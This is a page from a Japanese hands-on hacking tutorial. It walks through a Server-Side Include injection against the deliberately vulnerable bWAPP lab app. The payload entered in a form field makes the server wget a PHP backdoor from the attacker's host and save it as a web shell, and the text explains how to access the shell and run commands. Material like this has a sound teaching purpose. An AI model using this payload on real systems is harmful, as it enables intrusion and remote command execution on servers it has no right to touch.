
634
第2部 ハッキングを体験する
ブラウザから次のように入力します。
Firstname欄
<!--#execcmd="wgethttp://10.0.0.2/php-
backdoor.php.txt-O/var/www/bWAPP/
web_shell.php"-->
HelloTest,
YourIPaddressis:
10.0.0.1
Lastname欄 test
表示上は指定した文字列だけが表示され、wgetの実行結果はわかりません。ダ
ウンロードがうまくいっていれば、外部からアクセスできます。ブラウザで
http://10.0.0.103/bWAPP/web_shell.phpにアクセスすると、Webシェルが表示さ
れます(図7-30)(*15)(*16)。
図7-30 "php-backdoor.php" のメイン画面
*15:何も表示されない場合は、bee-box 内の "web_shell.php" ファイル内が空の可能性がありま
す。ログインして確かめてみてください。例えば、Kaliから正常にダウンロードできない場合は、
空ファイルになります。
*16:「execute command」欄にコマンドを入力して、[go]ボタンを押すと、実行結果を確認でき
ます。例えば、IP アドレスを確認する場合には、"ifconfig" と入力するのではなく、"/sbin/ifconfig"
のようにパスを付けた状態で実行します。なお、最初の画面に戻る場合には、ブラウザの戻るボ ...